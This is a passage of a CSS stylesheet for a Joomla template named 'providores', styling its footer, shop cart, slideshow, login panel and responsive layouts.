color: #e6e6e6;
}
.t3-footnav {
padding: 60px 0 40px;
*zoom: 1;
}
.t3-footnav:before,
.t3-footnav:after {
display: table;
content: "";
line-height: 0;
}
.t3-footnav:after {
clear: both;
}
.t3-footnav ul {
list-style: none;
margin-left: 0;
padding-left: 15px;
}
.t3-footnav ul li a {
display: block;
padding: 0 0 0 12px;
line-height: 20px;
margin-bottom: 5px;
background: url(../../templates/providores/images/arrow-left.png) no-repeat left 9px;
}
.t3-footnav ul li a:hover,
.t3-footnav ul li a:focus,
.t3-footnav ul li a:active {
background: url(../../templates/providores/images/arrow-left.png) no-repeat left 9px;
color: #FB9316;
}
.t3-footnav li {
line-height: 24px;
}
.t3-footnav .module-title {
font-size: 18px;
color: white;
text-transform: uppercase;
display: inline-block;
background: #2e2c2b;
border-left: 6px solid #fb9316;
padding: 0 10px;
font-weight: normal;
}
.t3-copyright {
border-top: 1px solid #2f2f2f;
font-size: 12px;
padding: 40px 0 80px;
*zoom: 1;
}
.t3-copyright:before,
.t3-copyright:after {
display: table;
content: "";
line-height: 0;
}
.t3-copyright:after {
clear: both;
}
.t3-copyright .custom p {
font-size: 12px;
color: #696159;
}
.t3-copyright .nav {
margin-bottom: 0;
}
.t3-copyright .nav ul {
display: none;
}
.t3-copyright .nav > li {
display: inline;
}
.t3-copyright .nav > li > a {
display: inline-block;
color: white;
margin-right: 20px;
font-size: 18px;
text-transform: uppercase;
}
.t3-copyright .nav > li > a:hover,
.t3-copyright .nav > li > a:focus,
.t3-copyright .nav > li > a:active {
background: none;
color: #FB9316;
}
.copyright {
float: left;
}
.poweredby {
float: right;
text-align: right;
}
.poweredby .t3-logo,
.poweredby .t3-logo-small {
float: right;
opacity: .5;
}
.home .box-product {
margin-left: 0;
}
.account-login-shop #btl .btl-panel > span {
box-shadow: none;
-webkit-border-radius: 0;
-moz-border-radius: 0;
border-radius: 0;
background: transparent !important;
color: #000 !important;
padding: 0;
font-size: 14px;
text-transform: uppercase;
border-right: solid 1px #c0b8af !important;
padding-right: 10px;
margin-right: 10px;
}
.account-login-shop #header_oc #cart .heading {
padding-left: 0;
}
.account-login-shop #btl .btl-panel {
float: left !important;
border-bottom: solid 1px #c0b8af;
padding-bottom: 10px;
}
.account-login-shop #header_oc .heading h4 {
background: url("../../templates/providores/images/shoping-icon.png") no-repeat left center;
padding-left: 25px;
}
.slideshow .ja-button-control {
background: transparent;
}
.slideshow .ja-contentslider-left,
.slideshow .ja-contentslider-right {
background: url("../../templates/providores/images/bc-lr.png") no-repeat left top;
border: none;
width: 54px;
height: 54px;
z-index: 99;
top: 200px;
}
.slideshow .ja-contentslider-left {
right: 0;
left: 5%;
}
.slideshow .ja-contentslider-right {
background-position: -56px 0;
right: 5%;
}
.slideshow .ja-contentslider-center-wrap {
width: 980px;
overflow: hidden;
margin: 0 auto;
}
.slideshow .ja-contentslider-left:hover,
.slideshow .ja-contentslider-right:hover {
background: url("../../templates/providores/images/bc-lr.png") no-repeat left -56px;
border: none;
cursor: pointer;
}
.slideshow .ja-contentslider-right:hover {
background-position: -56px -56px;
}
.container .ja-sidenews {
width: 25%;
float: left;
}
.ja-sidenews img {
width: 100%;
opacity: 0.7;
transition: opacity .5s ease-out;
-moz-transition: opacity .5s ease-out;
-webkit-transition: opacity .5s ease-out;
-o-transition: opacity .5s ease-out;
}
.ja-sidenews.ja-even .ja-slidenews-cover {
top: 0;
}
.ja-sidenews .ja-icon-even,
.ja-sidenews .ja-icon-odd {
display: block;
width: 26px;
height: 13px;
position: absolute;
left: 20px;
background: url("../../templates/providores/images/arrow-new.png");
z-index: 9;
}
.ja-sidenews .ja-icon-odd {
bottom: 120px;
background-position: left top;
}
.ja-sidenews .ja-icon-even {
top: 120px;
background-position: left bottom;
}
.ja-sidenews.ja-even img {
margin-top: 120px;
}
.ja-sidenews:hover h3 {
color: #fa9215 !important;
}
.ja-sidenews h3 {
font-size: 24px !important;
}
.ja-sidenews:hover img {
opacity: 1;
width: 100%;
}
.t3-sl {
padding-bottom: 30px;
padding-top: 0px;
}
@font-face {
font-family: 'Conv_SverigeScriptClean_Demo';
src: url('../../templates/providores/fonts/SverigeScript/SverigeScriptClean_Demo.eot');
src: local('☺'), url('../../templates/providores/fonts/SverigeScript/SverigeScriptClean_Demo.woff') format('woff'), url('../../templates/providores/fonts/SverigeScript/SverigeScriptClean_Demo.ttf') format('truetype'), url('../../templates/providores/fonts/SverigeScript/SverigeScriptClean_Demo.svg') format('svg');
font-weight: normal;
font-style: normal;
}
.t3-mainnav .navbar .nav > li {
display: inline-block;
float: none;
}
.t3-mainnav .navbar .nav {
text-align: center;
float: none;
}
.t3-mainnav .navbar .nav ul {
text-align: left;
}
.home .t3-sl-3,
.home .t3-sl-4 {
border: none !important;
}
.home .t3-sl-2 .customtitlenew p {
font-size: 20px;
color: black;
margin-bottom: 40px;
}
.customtitle-shop {
background: url("../../templates/providores/images/shop-by.png") no-repeat center center;
margin: 0px 0 30px 0;
}
.customtitle-shop h3 {
font-size: 16px;
}
.customtitlenew h3 {
text-shadow: 0 0 3px #f29400;
font-size: 50px !important;
font-family: 'Conv_SverigeScriptClean_Demo';
margin-bottom: 30px;
}
#ja-sidenews-jasd-modid110,
.customtitle-shop + .box_oc {
overflow: hidden;
padding-bottom: 41px;
background: url("../../templates/providores/images/shadow.png") no-repeat center bottom;
}
.t3-logos {
color: #696159 !important;
text-shadow: 0 1px 0 #000;
}
.t3-logos strong {
color: #dddfe4;
font-weight: normal;
display: inline-block;
padding: 1px 3px;
margin-left: 4px;
background: #2e2c2b;
}
#jmslideshow {
position: relative;
background: url("../../templates/providores/images/frame-slideshow.png") no-repeat center top;
margin: 20px auto 30px auto;
padding: 40px 30px 60px 30px;
width: 1000px;
}
#jmslideshow #jmslideshow-inner {
width: 934px;
margin-left: 43px;
background: black;
}
#jmslideshow-inner .jmslideshow .cycle-pager {
left: 50% !important;
margin-left: -85px;
background: url("../../templates/providores/images/navigation-slider.png") no-repeat center top;
min-width: 160px;
text-align: center;
min-height: 51px;
bottom: -40px !important;
}
#jmslideshow-inner .jmslideshow .cycle-pager span {
background-image: url("../../templates/providores/images/bullet.png");
background-position: -3px 20px;
background-repeat: repeat;
color: rgba(0,0,0,0);
cursor: pointer;
display: inline-block;
float: none;
margin-top: 17px;
width: 15px;
}
#jmslideshow-inner .jmslideshow .cycle-pager span.cycle-pager-active {
background-position: -3px 0px;
}
#jmslideshow-inner .slideshow-content p,
#jmslideshow-inner .jmslideshow .slideshow-content a {
display: inline-block;
background: rgba(0,0,0,0.9);
font-size: 30px;
line-height: 120%;
color: white;
padding: 5px 30px;
font-family: "QlassikMediumRegular";
}
#jmslideshow-inner .slideshow-content {
background: none;
border-radius: 0;
text-align: center;
}
.copyright .caret {
display: none !important;
}
.copyright .nav > li > a:active,
.copyright .nav > li > a:hover,
.copyright .nav > li > a:focus,
.copyright .nav li.dropdown.active a {
background: none !important;
color: #F29400 !important;
}
.customintagram {
width: 206px;
}
.customintagram img {
padding: 4px;
background: #f4f4f4;
border: 1px solid #c0bbb8;
border-radius: 2px;
box-shadow: 0 0 3px rgba(0,0,0,0.5);
}
.customintagram p + p img {
padding: 0px;
background: none;
border: 0px solid #c0bbb8;
border-radius: 0px;
box-shadow: 0 0 0px rgba(0,0,0,0.5);
}
.t3-sidebar .module-title {
background: #202020;
border-left: 6px solid #fb9316;
padding: 2px 0 0 5px;
font-size: 18px;
color: white;
margin-bottom: 15px;
font-weight: normal;
text-transform: uppercase;
}
.box_oc .box-home > div .name a {
text-transform: uppercase;
}
.t3-sidebar .box-category {
list-style: none;
margin-left: 0;
}
.t3-sidebar .box-category > li > a {
color: #1f1f1e;
font-size: 18px;
text-transform: uppercase;
padding: 0 0 0 12px;
display: block;
line-height: 24px;
background: url("../../templates/providores/images/arrow-left.png") no-repeat left 8px;
}
.t3-sidebar .box-category > li li a {
color: #1f1f1e;
font-size: 14px;
}
.t3-sidebar .box-category > li {
display: block;
padding: 10px 15px 8px;
background: url("../../templates/providores/images/bg-menu-left.png") no-repeat left top;
}
.checkout label {
display: inline;
margin: 0;
vertical-align: middle;
}
.checkout input[type="checkbox"],
.checkout input[type="radio"] {
margin: 0 !important;
}
.checkout-product table {
background: white;
}
.mijoshop_heading_h1 {
border-bottom: 1px solid #C5BFB8 !important;
padding-bottom: 20px !important;
}
.cart-info tbody .quantity input {
background: url(../../templates/providores/images/input-small-right.png) no-repeat left top;
box-shadow: 0 0 0 rgba(0,0,0,0);
padding: 8px 18px;
border: none;
vertical-align: middle;
}
td {
border-top: 1px solid #c5bfb8;
}
.highlight {
background-color: #FB9316;
}
.ja-slidenews-item {
border-bottom: 1px dotted #ccc;
padding: 8px 0;
float: left;
clear: both;
width: 100%;
}
.ja-slidenews-item .ja-title {
display: block;
font-weight: bold;
}
.ja-slidenews-item .ja-createdate {
color: #666;
font-size: 92%;
font-weight: bold;
padding: 2px 5px 2px 0;
}
.ja-sidenews-title {
font-weight: bold;
}
.ja-sidenews-postdate {
font-size: 85%;
}
.ja-sidenews {
width: 100%;
overflow: hidden;
position: relative;
padding: 0;
margin: 0;
cursor: pointer;
}
.ja-sidenews-display {
position: absolute;
top: 0;
z-index: 1;
height: 100%;
width: 100%;
}
.ja-sidenews-desc {
padding: 0px 3px 0px 3px;
}
.ja-slidenews-cover {
float: left;
position: absolute;
width: 100%;
z-index: 3;
overflow: hidden;
left: 0;
bottom: 0;
}
.ja-slidenews-item img {
border: 1px solid #21211C;
margin-right: 10px;
margin-top: 3px;
}
.ja-slidenews-item img[align="left"] {
float: left;
margin-right: 10px;
margin-left: 0;
}
.ja-slidenews-item img[align="right"] {
float: right;
margin-left: 10px;
margin-right: 0;
}
.box_oc .box-home .image img {
border: 0;
padding: 0;
}
.box_oc .box-home > div {
position: relative;
margin: 0;
padding: 0 0 0px 1px;
display: block;
float: left;
width: 162px;
min-height: 162px;
}
.box_oc .box-home > div:hover .name {
opacity: 1;
}
.box_oc .box-home > div .name a {
color: white;
font-size: 18px;
margin-top: 10px;
}
.box_oc .box-home > div .name {
background: rgba(0,0,0,0.7);
border-bottom: 2px solid #fa9215;
bottom: 0;
color: #FFFFFF;
line-height: 40px;
min-height: 20px;
position: absolute;
text-align: center;
width: 100%;
opacity: 0;
transition: opacity .5s ease-out;
-moz-transition: opacity .5s ease-out;
-webkit-transition: opacity .5s ease-out;
-o-transition: opacity .5s ease-out;
}
.parent ul {
display: none;
}
#btl {
float: left;
}
.account-login-shop .nav li {
display: inline-block;
}
.account-login-shop .nav {
margin-bottom: 0px;
padding-bottom: 6px;
border-bottom: 1px solid #C0B8AF;
display: block;
float: left;
}
.account-login-shop .nav li + li a {
border-right: none !important;
padding-right: 0;
margin-right: 0;
}
.account-login-shop .nav li {
cursor: pointer;
display: block;
float: left;
height: 26px;
line-height: 28px;
margin: 2px 0;
text-indent: 0 !important;
width: auto;
}
.account-login-shop .nav li a {
background: none repeat scroll 0 0 rgba(0,0,0,0) !important;
border-radius: 0 0 0 0;
border-right: 1px solid #C0B8AF !important;
box-shadow: none;
color: #000000 !important;
font-size: 14px;
margin-right: 10px;
padding: 0 10px 0 0;
text-transform: uppercase;
}
.head-search p {
color: black;
text-align: right;
}
.account-login-shop {
padding-top: 40px;
}
.account-login-shop .nav li a:hover,
.account-login-shop #btl .btl-panel > span:hover {
color: #F29400 !important;
}
.account-login-shop #btl .btl-panel {
border-bottom: 1px solid #C0B8AF;
float: left !important;
padding-bottom: 6px !important;
}
.head-search .mijosearch_input_module_simple {
background: url("../../templates/providores/images/input-seach.png") no-repeat scroll left top !important;
border: 0px solid #DCDCDC !important;
padding: 10px 0 8px 30px !important;
width: 186px !important;
box-shadow: 0 0 0 0 transparent !important;
margin-right: 0 !important;
}
.mijosearch_bg_module {
border-bottom: 1px solid #C0B8AF;
padding-top: 15px;
}
.t3-header {
padding-bottom: 0;
}
.head-search .mijosearch_input_module_simple:focus,
.head-search .mijosearch_input_module_simple:active {
box-shadow: 0 0 0 0 transparent !important;
}
.container.navbar {
box-shadow: 0 0 25px rgba(0,0,0,0.3);
}
.jmslideshow {
position: relative;
}
.jmslideshow .cycle-next,
.jmslideshow .cycle-next:hover,
.jmslideshow .cycle-next:visited,
.jmslideshow .cycle-next:active,
.jmslideshow .cycle-next:focus {
background: url("../../templates/providores/images/bc-lr.png") repeat scroll 98% 134% transparent;
height: 55px;
opacity: 0.6;
position: absolute;
right: -100px;
top: 45%;
width: 55px;
z-index: 99999;
text-indent: -999px;
overflow: hidden;
cursor: pointer;
background-position: -55px 0px;
}
.jmslideshow .cycle-next {
background-position: -55px -56px;
}
.jmslideshow .cycle-prev,
.jmslideshow .cycle-prev:hover,
.jmslideshow .cycle-prev:visited,
.jmslideshow .cycle-prev:active,
.jmslideshow .cycle-prev:focus {
background: url("../../templates/providores/images/bc-lr.png") repeat scroll 0 0;
height: 55px;
left: -100px;
opacity: 0.6;
position: absolute;
top: 45%;
width: 55px;
z-index: 99999;
text-indent: -999px;
overflow: hidden;
cursor: pointer;
}
.jmslideshow .cycle-prev {
background-position: 0 -56px;
}
.jmslideshow .slideshow-content {
font-family: tahoma, arial;
position: absolute;
width: 542px;
z-index: 600;
background: white;
color: black;
padding: 3px 10px 0px 10px;
opacity: .5;
border-radius: 5px;
}
.jmslideshow .slideshow-content p {
margin-top: -4px;
line-height: 1.4em !important;
}
.jmslideshow .slideshow-content a {
color: green;
}
.jmslideshow .slideshow-content div:first-child {
font-weight: bold;
}
.jmslideshow .cycle-pager {
position: absolute;
z-index: 999;
}
.jmslideshow .cycle-pager span {
background-image: url("../../templates/providores/images/control_button.png");
background-repeat: repeat;
background-position: 92px 132px;
color: transparent;
display: block;
float: left;
height: 15px;
margin-right: 5px;
text-indent: -999px;
width: 15px;
cursor: pointer;
}
.jmslideshow .cycle-pager span.cycle-pager-active {
background-position: 64px 132px;
}
.jmslideshow .pager-number span {
background: none repeat scroll 0 0 rgba(0,0,0,0.7);
color: #FFFFFF;
cursor: pointer;
display: block;
float: left;
height: 15px;
margin-right: 5px;
padding: 3px;
text-align: center;
text-indent: 0;
width: 15px;
}
.jmslideshow .pager-number span a {
color: #fff;
text-decoration: none;
}
.jmslideshow .pager-number span.cycle-pager-active {
background: rgba(127,0,12,0.8);
}
#header_oc {
height: 40px;
margin-bottom: 7px;
padding-bottom: 4px;
position: relative;
clear: both;
z-index: 999;
}
#header_oc #cart {
position: absolute;
top: -5px;
left: 70px;
z-index: 9;
}
#header_oc #cart .heading {
float: left;
margin-top: 15px;
padding-left: 14px;
padding-right: 14px;
position: relative;
z-index: 1;
}
#header_oc #cart .heading h4 {
font-size: 15px;
font-weight: normal;
margin-top: 0px;
margin-bottom: 3px;
}
#header_oc #cart .heading a {
text-decoration: none;
position: absolute;
min-width: 140px;
top: 8px;
left: 110px;
}
#header_oc #cart .content_oc {
clear: both;
display: none;
position: relative;
top: -1px;
padding: 8px;
min-height: 150px;
border-top: 1px solid #333;
border-left: 1px solid #333;
border-right: 1px solid #333;
border-bottom: 1px solid #333;
-webkit-border-radius: 0px 7px 7px 7px;
-moz-border-radius: 0px 7px 7px 7px;
-khtml-border-radius: 0px 7px 7px 7px;
border-radius: 0px 7px 7px 7px;
-webkit-box-shadow: 0px 2px 2px rgba(0,0,0,0.4);
-moz-box-shadow: 0px 2px 2px rgba(0,0,0,0.4);
box-shadow: 0px 2px 2px rgba(0,0,0,0.4);
background: #FFF;
min-width: 210px;
}
#header_oc #cart.active .content_oc {
display: block;
}
.mini-cart-info table {
border-collapse: collapse;
width: 100%;
margin-bottom: 5px;
}
.mini-cart-info td {
color: #000;
vertical-align: top;
padding: 10px 5px;
}
.mini-cart-info .image {
width: 1px;
}
.mini-cart-info .image img {
border: 1px solid #EEEEEE;
text-align: left;
max-width: none !important;
}
.mini-cart-info .name small {
color: #666;
}
.mini-cart-info .quantity {
text-align: right;
}
.mini-cart-info td.total {
text-align: right;
}
.mini-cart-info .remove {
text-align: right;
}
.mini-cart-info .remove img {
cursor: pointer;
}
.mini-cart-total {
text-align: right;
}
.mini-cart-total table {
border-collapse: collapse;
display: inline-block;
margin-bottom: 5px;
}
.mini-cart-total td {
color: #000;
padding: 4px;
}
#header_oc #cart .checkout {
text-align: right;
clear: both;
}
#header_oc #cart .empty {
padding-top: 50px;
text-align: center;
}
#header_oc #search_oc {
position: absolute;
top: 15px;
right: 0px;
width: 150px;
z-index: 15;
}
#header_oc .button_oc-search {
position: absolute;
left: 0px;
background: url('../../templates/providores/image/button-search.png') center center no-repeat;
width: 28px;
height: 24px;
border-right: 1px solid #CCCCCC;
cursor: pointer;
}
#header_oc #search_oc input {
background: #FFF;
padding: 1px 1px 1px 33px;
width: 110px;
height: 21px;
border: 1px solid #CCCCCC;
-webkit-border-radius: 3px 3px 3px 3px;
-moz-border-radius: 3px 3px 3px 3px;
-khtml-border-radius: 3px 3px 3px 3px;
border-radius: 3px 3px 3px 3px;
-webkit-box-shadow: 0px 2px 0px #F0F0F0;
-moz-box-shadow: 0px 2px 0px #F0F0F0;
box-shadow: 0px 2px 0px #F0F0F0;
}
.product-info .cart div {
line-height: 28px;
}
.product-info .price span,
.product-info .price {
font-size: 25px;
color: #1f1f1f;
}
.product-info .des {
margin: 0 0 10px 0;
}
.product-info .cart {
border-left: 6px solid #fb9316;
padding-left: 1px;
}
.product-info .cart .cart-inner {
background: #f3ede8;
padding: 4px 10px;
border: 1px solid #c0b8af;
}
.product-info .cart .pull-right {
width: 135px;
color: #1f1f1f;
font-size: 16px;
}
.product-info .cart .pull-right > span {
position: relative;
top: -3px;
}
.product-info .cart .pull-right input[type="text"] {
padding-left: 20px;
padding-top: 10px;
padding-right: 15px;
border: none;
box-shadow: 0 0 0 transparent;
margin: 0;
background: url(../../templates/providores/images/input-small.png) no-repeat left top;
}
.product-info .cart .pull-right .btn {
float: right;
margin: 0 0 0 10px;
}
.product-info > .left {
background: white;
padding: 13px;
width: 324px;
float: left;
margin-right: 22px;
}
.right h3 {
margin: 0 0 10px 0;
font-weight: normal;
}
.model-stock {
padding: 8px 0;
margin: 10px 0;
border: 1px solid #c5bfb8;
border-left: 0;
border-right: 0;
}
.model-stock span {
color: #333027;
}
.model {
margin-right: 10px;
}
.product-info .image {
float: left;
margin-bottom: 2px;
text-align: center;
}
.product-info .image-additional {
width: 100%;
clear: both;
overflow: hidden;
}
.product-info .image-additional a {
float: left;
display: block;
margin-left: 1px;
margin-bottom: 1px;
}
.product-info > .right {
overflow: hidden;
}
.product-info .image {
border: 0px solid #E7E7E7;
padding: 0px;
}
.article-title,
.article-header h1 {
line-height: 50px;
padding-bottom: 10px;
border-bottom: 1px solid #C5BFB8;
margin-bottom: 14px;
}
.article-title,
.article-header h1,
.article-title,
.article-header h1 a,
h1,
.mijoshop_heading_h1 {
color: #202020;
font-size: 50px;
text-transform: uppercase !important;
}
.mini-cart-info tr {
border-top: 0px solid #C5BFB8;
}
.mini-cart-info tr + tr {
border-top: 1px solid #C5BFB8;
}
.t3-mainnav .nav li.dropdown.open > .dropdown-toggle,
.dropdown-menu li > a:hover,
.dropdown-menu li > a:focus,
.dropdown-submenu:hover > a {
background: #F29400;
color: #EEEEEE;
}
.divider-vertical {
border-color: #1F1F1F -moz-use-text-color;
}
.article-content li {
color: #fb9316;
}
.article-content li a {
color: #202020;
}
#system-message {
margin-top: -10px;
}
h2,
h2 a {
color: #fb9316;
font-size: 30px;
line-height: 37px;
margin-bottom: 14px;
}
h3,
h3 a {
color: #202020;
font-size: 24px;
line-height: 37px;
margin-bottom: 14px;
}
h4,
h4 a {
color: #202020;
font-size: 20px;
line-height: 37px;
margin-bottom: 14px;
}
.t3-megamenu .mega-nav,
.t3-megamenu .dropdown-menu .mega-nav {
list-style: none outside none;
margin: 0;
padding: 0;
}
.t3-megamenu .span12.mega-col-nav .mega-inner {
padding: 5px;
}
.jmslide-item > img {
max-width: none !important;
}
#simplemodal-overlay {
background-color: #000;
}
#simplemodal-container a.modalCloseImg {
background: url(../../templates/providores/images/close_bt.png) top no-repeat;
width: 26px;
height: 26px;
display: inline;
z-index: 3200;
position: absolute;
top: 6px;
right: 10px;
cursor: pointer;
}
#simplemodal-container a.modalCloseImg:hover {
background: url(../../templates/providores/images/close_bt.png) bottom no-repeat;
width: 26px;
height: 26px;
display: inline;
z-index: 3200;
position: absolute;
top: 6px;
right: 10px;
cursor: pointer;
}
.simplemodal-wrap {
overflow: visible !important;
}
.btl-content-block {
background: none repeat scroll 0 0 #FFFFFF;
border-radius: 4px;
border: 1px solid #dadada;
box-shadow: 8px 8px 8px rgba(0,0,0,0.4);
display: none;
height: auto;
overflow: hidden;
text-align: left;
font-size: 12px;
position: relative;
}
.btl-content-block form {
margin: 0;
padding: 0;
}
.btl-content-block h3 {
background: url("../../templates/providores/images/header_bglogin.jpg") repeat-x scroll left top transparent;
font-weight: normal;
line-height: 35px;
margin: 0px;
padding: 3px 0px 0px 19px !important;
text-transform: uppercase;
font-size: 18px;
}
.btl-input > input[type=text],
.btl-input > input[type=password] {
border: 1px solid #dadada;
border-radius: 4px;
margin: 5px 0;
text-indent: 5px;
width: 189px;
height: 26px;
padding: 0;
box-shadow: 0 1px 1px rgba(0,0,0,0.075) inset;
transition: border 0.2s linear 0s, box-shadow 0.2s linear 0s;
}
.btl-input > input:focus {
border-color: #E9322D;
box-shadow: 0 0 6px #F8B9B7;
}
#btl {
position: relative;
}
#btl .btl-panel {
overflow: hidden;
}
#btl .btl-panel > #btl-panel-profile {
background: url(../../templates/providores/images/btl-panel-bg.png) top right no-repeat;
padding-right: 30px;
}
button::-moz-focus-inner {
padding: 0;
border: none;
}
#btl .btl-panel > span {
display: inline-block;
height: 26px;
line-height: 28px;
padding: 0 18px;
cursor: pointer;
text-indent: 0 !important;
width: auto;
}
#btl .btl-panel > span {
margin: 2px 0px;
box-shadow: 1px 1px 1px rgba(0,0,0,0.5);
}
#btl .btl-panel > span,
button.btl-buttonsubmit,
input.btl-buttonsubmit {
border-radius: 3px;
}
#btl .btl-panel > span.active,
button.btl-buttonsubmit:focus,
input.btl-buttonsubmit:focus {
opacity: 0.8;
}
.btl-error {
display: none;
}
.btl-error-detail {
display: none;
float: right;
color: #FF0000;
margin-bottom: 4px;
}
.btl-field,
#register-link,
.btl-error-detail,
.btl-error,
.btl-note {
margin-left: 20px;
margin-right: 25px !important;
overflow: hidden;
}
.btl-label {
float: left !important;
}
.btl-input {
float: right !important;
}
.btl-label,
.btl-input {
line-height: 38px;
height: 38px;
}
#recaptcha {
height: auto !important;
float: right;
}
#btl-content-login .btl-input input {
width: 190px;
}
#btl-checkbox-remember {
width: 15px !important;
vertical-align: middle;
padding: 0;
margin: 0;
}
.clear {
clear: both;
}
.btl-error {
color: #FF0000;
}
input.btl-buttonsubmit,
button.btl-buttonsubmit {
border: none !important;
box-shadow: 1px 1px 3px rgba(9,4,3,0.86);
cursor: pointer;
text-align: center !important;
text-shadow: 0 1px 1px #4A4A4A;
width: auto !important;
padding: 0 12px;
height: 29px !important;
line-height: 29px !important;
display: inline-block;
}
div.btl-buttonsubmit {
text-align: center !important;
padding: 5px 0 0 0 !important;
border-top: 1px solid #dddddd;
margin: 10px 25px 30px 20px;
}
#btl-content ul li a:hover {
color: #7BA428 !important;
text-decoration: underline !important;
background-color: transparent !important;
}
#btl-content > .btl-content-block {
position: absolute !important;
z-index: 9999;
}
#btl-content #btl-content-login {
width: 350px;
}
#btl-content-registration {
min-width: 350px;
}
.btl-note,
#register-link {
padding: 18px 0px;
}
#btl-content-login .btl-input {
float: right;
}
#btl-content-login .spacer {
height: 14px;
}
#btl-content div.btl-buttonsubmit {
border-top: 1px dotted #c4c4c4;
}
#btl-content #btl-content-login .btl-label {
line-height: 38px;
min-width: 0px !important;
}
#btl-content #btl-content-profile {
overflow: hidden;
}
#module-in-profile {
min-width: 200px;
}
#btl-content #btl-content-profile #module-in-profile ul {
position: static;
text-align: left;
margin: 0 0 0 15px;
padding: 0 !important;
}
#btl-content-profile ul.menu li {
background: url("../../templates/providores/images/bullet.png") no-repeat scroll 5px 15px transparent;
padding: 0 0 0 20px !important;
border-bottom: 1px solid #E8E8E8;
display: list-item !important;
line-height: 37px;
}
#btl-content #btl-content-profile #module-in-profile ul li a {
color: #6b6b6b;
text-decoration: none !important;
text-transform: none !important;
font-family: arial, tahoma;
}
#btl-content-profile ul.menu li a {
color: #616161 !important;
text-decoration: none !important;
border: none !important;
background: none !important;
display: inline !important;
padding: 0 !important;
margin: 0 !important;
text-transform: none !important;
}
#btl-content-profile div.btl-buttonsubmit {
clear: both;
margin-bottom: 15px;
border: none !important;
text-align: center;
margin-top: 0 !important;
}
#btl-register-in-process,
#btl-login-in-process {
display: none;
background: url("../../templates/providores/images/loading.gif") no-repeat #000 50%;
opacity: 0.4;
width: 100%;
height: 100%;
position: absolute;
z-index: 9999;
top: -1px;
left: -1px;
padding-top: 1px;
padding-left: 1px;
}
#btl-success {
display: none;
margin: 20px 0 30px 0;
background: url("../../templates/providores/images/notice-info.png") no-repeat;
display: none;
color: #000;
border-bottom: 2px solid #90B203;
border-top: 2px solid #90B203;
font-size: 14px;
padding: 10px 10px 10px 25px;
}
#bt_ul {
margin-top: -10px !important;
margin-bottom: 20px !important;
margin-right: 25px !important;
float: right;
}
#btl-content-login ul {
position: static !important;
text-align: left;
list-style-type: disc !important;
}
#btl-content-login ul li {
margin-top: 3px;
}
#bt_ul li a {
padding: 0 !important;
text-decoration: none !important;
color: #545454 !important;
}
#btl-wrap-module {
padding-left: 20px;
padding-bottom: 20px;
padding-top: 10px;
}
@media (max-width: 1116px) {
.jmslideshow .cycle-next,
.jmslideshow .cycle-next:hover,
.jmslideshow .cycle-next:visited,
.jmslideshow .cycle-next:active,
.jmslideshow .cycle-next:focus {
right: 10px !important;
}
.jmslideshow .cycle-prev,
.jmslideshow .cycle-prev:hover,
.jmslideshow .cycle-prev:visited,
.jmslideshow .cycle-prev:active,
.jmslideshow .cycle-prev:focus {
left: 10px !important;
}
}
@media (min-width: 980px) and (max-width: 1024px) {
#jmslideshow {
width: 100%;
padding: 40px 0 60px 0;
background-position: -56px center;
}
#btl-content #btl-content-profile {
right: 0 !important;
left: 10px;
width: 150px;
}
#jmslideshow #jmslideshow-inner {
margin-top: -7px;
margin-left: 43px;
}
.product-grid > div {
width: 208px;
}
.box_oc .box-home > div {
width: 183px;
}
.container .ja-sidenews {
height: 353px !important;
}
}
@media (min-width: 768px) and (max-width: 979px) {
#btl-content #btl-content-profile {
right: 0 !important;
left: 10px;
width: 150px;
}
.logo-image a {
width: 230px;
background-size: 101%;
}
.product-grid > div {
width: 220px;
}
.t3-mainnav .navbar .nav > li > a {
padding: 12px 10px;
}
.container .ja-sidenews {
height: 300px !important;
}
#ja-sidenews-jasd-modid110,
.customtitle-shop + .box_oc {
padding-bottom: 0 !important;
}
#jmslideshow-inner .slideshow-content {
left: 50px !important;
}
.box_oc .box-home > div {
width: 183px;
}
#jmslideshow {
background: none;
margin: 20px auto 30px auto;
padding: 0px;
width: 100%;
}
.product-info > .left {
float: none;
width: 100%;
margin-bottom: 15px;
}
.product-info > .right {
float: none;
width: 100%;
}
.container .ja-sidenews,
#ja-sidenews-jasd-modid110,
.customtitle-shop + .box_oc {
background: white;
}
#jmslideshow #jmslideshow-inner {
width: 100%;
margin-left: 0px;
background: black;
}
}
@media (max-width: 767px) {
#btl-content #btl-content-profile {
right: 0 !important;
left: 00px;
width: 300px;
}
#jmslideshow-inner .slideshow-content p,
#jmslideshow-inner .jmslideshow .slideshow-content a {
font-size: 20px;
}
#jmslideshow-inner .slideshow-content {
left: 50px !important;
}
.t3-mainnav .navbar .nav > li > a {
padding: 12px 10px;
}
.row .head-search {
float: left !important;
}
.row .mijosearch_bg_module {
border-bottom: 0px solid #C0B8AF;
}
#jmslideshow {
background: none;
margin: 20px auto 30px auto;
padding: 0px;
width: 100%;
}
.container .ja-sidenews,
#ja-sidenews-jasd-modid110,
.customtitle-shop + .box_oc {
background: white;
}
#jmslideshow #jmslideshow-inner {
width: 100%;
margin-left: 0px;
background: black;
}
.jmslideshow .slideshow-content {
left: 0 !important;
top: 30% !important;
width: auto !important;
}
.container .ja-sidenews,
.box_oc .box-home > div {
width: 100% !important;
float: none !important;
}
.box_oc .box-home .image img {
width: 100%;
}
.ja-sidenews.ja-even img {
margin-top: 0px;
}
.ja-sidenews.ja-even .ja-slidenews-cover {
bottom: 0;
top: auto;
}
.ja-sidenews .ja-icon-even,
.ja-sidenews .ja-icon-odd {
display: none;
}
.mijosearch_bg_module,
.head-search p {
text-align: left;
}
.product-grid > div {
width: 100%;
float: none;
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
box-sizing: border-box;
}
.pull-right[class*="span"],
.row-fluid .pull-right[class*="span"] {
float: none;
}
#tab-related .product-grid > div {
width: 100%;
}
.product-info > .left {
float: none;
width: 100%;
margin-bottom: 15px;
}
.product-info > .right {
float: none;
width: 100%;
}
.jmslideshow .cycle-next,
.jmslideshow .cycle-next:hover,
.jmslideshow .cycle-next:visited,
.jmslideshow .cycle-next:active,
.jmslideshow .cycle-next:focus {
right: 10px !important;
}
.jmslideshow .cycle-prev,
.jmslideshow .cycle-prev:hover,
.jmslideshow .cycle-prev:visited,
.jmslideshow .cycle-prev:active,
.jmslideshow .cycle-prev:focus {
left: 10px !important;
}
.mijosearch_bg_module,
.head-search p,
.row .mijosearch_bg_module {
text-align: center;
}
#header_oc #cart .heading a {
top: 0;
}
.account-login-shop {
margin: 0 auto;
width: 288px;
}
}
@media (max-width: 480px) {
.checkout-content .right,
.checkout-content .left {
float: none;
width: 100%;
}
.checkout-content .right input[type="text"],
.checkout-content .right input[type="password"],
